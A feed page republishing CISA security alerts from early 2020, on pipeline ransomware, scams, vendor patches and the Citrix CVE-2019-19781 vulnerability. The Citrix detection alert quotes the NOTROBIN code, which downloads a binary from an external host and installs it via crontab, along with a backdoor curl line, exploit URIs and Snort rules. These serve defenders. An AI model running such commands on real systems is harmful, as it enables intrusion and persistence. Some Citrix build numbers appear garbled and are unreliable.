Sicurezza – News ENG
News, Alert e Bollettini da Computer Emergency Response Team in lingua inglese
AA20-049A: Ransomware Impacting Pipeline Operations
by CISA on 18 Febbraio 2020 at 1:06 pm
Original release date: February 18, 2020SummaryNote: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations. The Cybersecurity and Infrastructure Security Agency (CISA) encourages asset owner operators across all critical infrastructure sectors to review the below threat actor techniques and ensure the corresponding mitigations are applied. CISA responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks. Technical DetailsNetwork and Assets The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks. The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers. Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted. The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process. All OT assets directly impacted by the attack were limited to a single geographic facility. Planning and Operations At no time did the threat actor obtain the ability to control or manipulate operations. The victim took offline the HMIs that read and control operations at the facility. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations. The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security. Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days. Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks. The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning. MitigationsAsset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy. Planning and Operational Mitigations Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue. Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks. Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks. Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised. Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities. Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program. Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors. Technical and Architectural Mitigations Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks. Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network. Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources. Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware. Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties. Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users. Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses. Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists. Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system. Set Antivirus/Antimalware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware. Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications. Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder. Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032]. Resources CISA Ransomware One-Pager and Technical Document (CISA, 2019) CISA Insights: Ransomware Outbreak (CISA, 2019) Pipeline Cybersecurity Initiative (CISA, 2018) CISA Webinar: Combating Ransomware (CISA, 2018) Framework for Improving Critical Infrastructure Cybersecurity (NIST, 2018) Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events (NIST, 2018) Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events (NIST, 2018) Pipeline Security Guidelines (TSA, 2018) NIST SP 800-11: Data Integrity: Recovering from Ransomware and Other Destructive Events (NIST, 2017) Guide to Industrial Control Systems (ICS) Security (NIST, 2015) Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model (DOE, 2014) Revisions February 18, 2020: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.
Be Cautious of Romance Scams
by CISA on 14 Febbraio 2020 at 3:39 pm
Original release date: February 14, 2020This Valentine’s Day, the Cybersecurity and Infrastructure Security Agency (CISA) reminds users to be wary of internet romance scams. Cyber criminals partaking in this type of fraud target victims, gain their confidence, and convince them to transfer funds. When online dating, use caution and never send gifts or money to someone you have not met in person. CISA encourages online daters to review the Federal Trade Commission’s alert It’s not true love if they ask for money and watch the FTC video Online Romance Imposter Scams. For more information review CISA’s Tip on Staying Safe on Social Networking Sites. If you believe you have been a victim of a romance scam, file a report with: The online dating site, The Federal Trade Commission, and The Federal Bureau of Investigation's Internet Crime Complaint Center. This product is provided subject to this Notification and this Privacy & Use policy.
North Korean Malicious Cyber Activity
by CISA on 14 Febbraio 2020 at 12:40 pm
Original release date: February 14, 2020The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD) have identified the following malware variants used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. HOPLIGHT (update) BISTROMATH SLICKSHOES HOTCROISSANT ARTFULPIE BUFFETLINE CROWDEDFLOUNDER CISA encourages users and administrators to review the Malware Analysis Reports for each malware variant listed above and the North Korean Malicious Cyber Activity page for more information. This product is provided subject to this Notification and this Privacy & Use policy.
New SchoolSafety.gov Provides Cyber Guidance for K-12 Schools
by CISA on 12 Febbraio 2020 at 3:59 pm
Original release date: February 12, 2020 | Last revised: February 13, 2020The Federal School Safety Clearinghouse just launched its website: SchoolSafety.gov. This website—a collaboration between the Department of Homeland Security and the U.S. Departments of Education, Justice, and Health and Human Services—features a fact sheet on Cyber Safety Considerations for K-12 Schools and School Districts. The factsheet provides guidance to educators, administrators, parents, and law enforcement officials on various online threats to students, including cyberbullying, ransomware, and online predation. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users to read Cyber Safety Considerations for K-12 Schools and School Districts and to visit SchoolSafety.gov to learn more about all the resources available. Refer to CISA’s Tips on Keeping Children Safe Online and Dealing with Cyberbullies for additional best practices. This product is provided subject to this Notification and this Privacy & Use policy.
FBI Releases IC3 2019 Internet Crime Report
by CISA on 12 Febbraio 2020 at 3:58 pm
Original release date: February 12, 2020 | Last revised: February 13, 2020The Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) has released the 2019 Internet Crime Report, which includes statistics based on data reported by the public through the IC3 website. The top three crimes types reported by victims in 2019 were phishing/vishing/smishing/pharming, non-payment/non-delivery, and extortion. FBI urges users to continue reporting complaints at www.ic3.gov to help law enforcement better combat cybercrime. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users to review the FBI press release and CISA’s Tip on Avoiding Social Engineering and Phishing Attacks for more information. This product is provided subject to this Notification and this Privacy & Use policy.
Microsoft Releases February 2020 Security Updates
by CISA on 11 Febbraio 2020 at 8:12 pm
Original release date: February 11, 2020Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft’s February 2020 Security Update Summary and Deployment Information and apply the necessary updates. This product is provided subject to this Notification and this Privacy & Use policy.
Intel Releases Security Updates
by CISA on 11 Febbraio 2020 at 7:14 pm
Original release date: February 11, 2020Intel has released security updates to address vulnerabilities in multiple products. An attacker could exploit these vulnerabilities to gain escalation of privileges. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Intel advisories and apply the necessary updates: RWC3 Advisory INTEL-SA-00341 MPSS Advisory INTEL-SA-00340 RWC2 Advisory INTEL-SA-00339 SGX SDK Advisory INTEL-SA-00336 CSME Advisory INTEL-SA-00307 Renesas Electronics USB 3.0 Driver Advisory INTEL-SA-00273 This product is provided subject to this Notification and this Privacy & Use policy.
Adobe Releases Security Updates for Multiple Products
by CISA on 11 Febbraio 2020 at 4:16 pm
Original release date: February 11, 2020Adobe has released security updates to address vulnerabilities in multiple Adobe products. An attacker could exploit some of these vulnerabilities to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Adobe Security Bulletins and apply the necessary updates: Framemaker APSB20-04 Acrobat and Reader APSB20-05 Flash Player APSB20-06 Digital Editions APSB20-07 Experience Manager APSB20-08 This product is provided subject to this Notification and this Privacy & Use policy.
Mozilla Releases Security Updates for Multiple Products
by CISA on 11 Febbraio 2020 at 4:10 pm
Original release date: February 11, 2020Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR, and Thunderbird. An attacker could exploit some of these vulnerabilities to take control of an affected system. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Mozilla Security Advisories and apply the necessary updates: Firefox 73 Firefox ESR 68.5 Thunderbird 68.5 This product is provided subject to this Notification and this Privacy & Use policy.
Safer Internet Day
by CISA on 10 Febbraio 2020 at 3:58 pm
Original release date: February 10, 2020February 11, 2020, is Safer Internet Day, a worldwide event aimed at promoting the safe and positive use of digital technology for all users, especially children and teens. This year's theme—Together for a better internet—encourages everyone to play their part in creating a safer, more secure internet. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users to view the Safer Internet Day website and the following tips: Keeping Children Safe Online Dealing with Cyberbullies Rethink Cyber Safety Rules and the “Tech Talk” with Your Teens This product is provided subject to this Notification and this Privacy & Use policy.
ACSC Releases Advisory on Mailto Ransomware Incidents
by CISA on 6 Febbraio 2020 at 7:13 pm
Original release date: February 6, 2020The Australian Cyber Security Centre (ACSC) has released an advisory on Mailto ransomware incidents. The ACSC has limited information regarding the initial intrusion vector for Mailto, also known as Kazakavkovkiz, but evidence suggests that Mailto actors may have used phishing and password spray attacks to comprise user accounts. The ACSC provides recommendations for users to detect and mitigate these types of attacks and assist with limiting their spread within networks. The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the ACSC advisory on Mailto ransomware incidents and CISA’s Tip on Protecting Against Ransomware for more information. This product is provided subject to this Notification and this Privacy & Use policy.
AA20-031A: Detecting Citrix CVE-2019-19781
by CISA on 31 Gennaio 2020 at 6:07 pm
Original release date: January 31, 2020 | Last revised: February 18, 2020SummaryUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781. Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later. Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed. The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation. Contact CISA, or the FBI to report an intrusion or to request assistance. Technical DetailsDetection CISA has developed the following procedures for detecting a CVE-2019-19781 compromise. HTTP Access and Error Log Review Context: Host Hunt Type: Methodology The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released. '*/../vpns/*' '*/vpns/cfg/smb.conf' '*/vpns/portal/scripts/newbm.pl*' '*/vpns/portal/scripts/rmbm.pl*' '*/vpns/portal/scripts/picktheme.pl*' Note: These URIs were observed in Security Information and Event Management detection content provided by https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml. Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like. 10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT " 10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT" Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity. grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1 grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1 Running Processes Review Context: Host Hunt Type: Methodology Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors. ps auxd | grep nobody Analysts should review the ps output for suspicious entries such as this: nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `– sh -c uname & curl -o – http://10.1.1.2/backdoor Further pivoting can be completed using the Process ID from the PS output: lsof -p <pid> Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process. Checking for NOTROBIN Presence Context: Host Hunt Type: Methodology pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &" The above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job. Running the command find / -name ".init" 2> /tmp/error.log should return the path to the created staging directory while taking all of the errors and creating a file located at /tmp/error.log. Additional /var/log Review Context: Host Hunt Type: Methodology Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) on and should try to identify any suspicious commands that may have been run, such as whoami or curl. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log. bash.log Sample Log Entry: Jan 10 13:35:47 <local7.notice> ns bash: nobody on /dev/pts/3 shell_command="hostname" Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity. sh.log notice.log Check Crontab for Persistence Context: Host Hunt Type: Methodology As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a httpd process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command: crontab -l -u nobody Existence of Unusual Files Context: Host Hunt Type: Methodology Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server. /netscaler/portal/templates /var/tmp/netscaler/portal/templates Snort Alerts Context: Network Alert Type: Signatures Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server. These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives. alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"|0d0a|Connection: Keep-Alive"; content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6 a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74 2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534 3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;) Suspicious Network Traffic Context: Network Hunt Type: Methodology From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics. Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.). Inbound Exploitation Activity (Suspicious URIs) index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml Outbound Traffic Search (Backdoor C2) index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET> | stats count by src dest dest_port | sort -count The following resources provide additional detection measures. Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781. The tool aids customers with detecting potential IOCs based on known attacks and exploits. The National Security Agency released a Cybersecurity Advisory on CVE-2020-19781 with additional detection measures. CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781. Impact CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system. The vulnerability affects the following appliances: Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12 Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 18.104.22.168 Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 22.214.171.124 Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 126.96.36.199 Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 188.8.131.52 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer). MitigationsThe resources provided include steps for standalone, HA pairs, and clustered Citrix instances. Use Citrix's tool to check for the vulnerability. https://support.citrix.com/article/CTX269180 Use an open-source utility to check for the vulnerability or previous device compromise. https://github.com/cisagov/check-cve-2019-19781 https://github.com/x1sec/citrixmash_scanner https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2 Follow instructions from Citrix to mitigate the vulnerability. https://support.citrix.com/article/CTX267679 https://support.citrix.com/article/CTX267027 Upgrade firmware to a patched version. Subscribe to Citrix Alerts for firmware updates. https://support.citrix.com/user/alerts Patch devices to the most current version. https://www.citrix.com/downloads/citrix-gateway/ https://www.citrix.com/downloads/citrix-adc/ https://www.citrix.com/downloads/citrix-sd-wan/ Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances. CISA's Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies. References  Citrix blog: Citrix releases final fixes for CVE-2019-19781  GitHub web_citrix_cve_2019_19781_exploit.yml  TrustedSec blog: NetScaler Remote Code Execution Forensics  FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)  FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)  IOC scanning tool for CVE-2019-19781  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability  CISA Vulnerability Test Tool Revisions January 31, 2020: Initial Version February 7, 2020: Added link to the Australian Cyber Security Centre script This product is provided subject to this Notification and this Privacy & Use policy.
AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
by CISA on 20 Gennaio 2020 at 2:54 pm
Original release date: January 20, 2020 | Last revised: January 27, 2020SummaryNote: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781. On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. On January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. On January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. On January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5. A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild. The Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible. Timeline of Specific Events December 17, 2019 – Citrix released Security Bulletin CTX267027 with mitigations steps. January 8, 2020 – The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, and CISA releases a Current Activity entry. January 10, 2020 – The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781. January 11, 2020 – Citrix released blog post on CVE-2019-19781 with timeline for fixes. January 13, 2020 – CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability. January 16, 2020 – Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781. January 19, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes. January 22, 2020 – Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3. January 22, 2020 – Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781. January 23, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0. January 24, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5. Technical DetailsImpact On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild. The vulnerability affects the following appliances: Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12 Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 184.108.40.206 Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 220.127.116.11 Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 18.104.22.168 Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 22.214.171.124 Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer). Detection Measures Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781 on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits. See the National Security Agency’s Cybersecurity Advisory on CVE-2020-19781 for other detection measures. CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781. CISA encourages administrators to visit CISA’s GitHub page to download and run the tool. MitigationsCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible. The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC, Citrix Gateway, and Citrix SD-WAN. Until the appropriate update is implemented, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781. Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments. Refer to table 1 for Citrix’s fix schedule. Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781 Vulnerable Appliance Firmware Update Release Date Citrix ADC and Citrix Gateway version 10.5 Refresh Build 10.5.70.12 January 24, 2020 Citrix ADC and Citrix Gateway version 11.1 Refresh Build 126.96.36.199 January 19, 2020 Citrix ADC and Citrix Gateway version 12.0 Refresh Build 188.8.131.52 January 19, 2020 Citrix ADC and Citrix Gateway version 12.1 Refresh Build 184.108.40.206 January 23, 2020 Citrix ADC and Citrix Gateway version 13.0 Refresh Build 220.127.116.11 January 23, 2020 Citrix SD-WAN WANOP Release 10.2.6 Build 10.2.6b January 22, 2020 Citrix SD-WAN WANOP Release 11.0.3 Build 11.0.3b January 22, 2020 Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy: “Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.” References  Citrix blog: Citrix releases final fixes for CVE-2019-19781  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway  United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability  CERT/CC Vulnerability Note VU#619785  CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway  Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability  CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov – check-cve-2019-19781  Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated  Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP  Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781  Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0  Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781  NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway  CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov – check-cve-2019-19781  Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway  Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway Revisions January 20, 2020: Initial Version January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0 January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5 This product is provided subject to this Notification and this Privacy & Use policy.
AA20-014A: Critical Vulnerabilities in Microsoft Windows Operating Systems
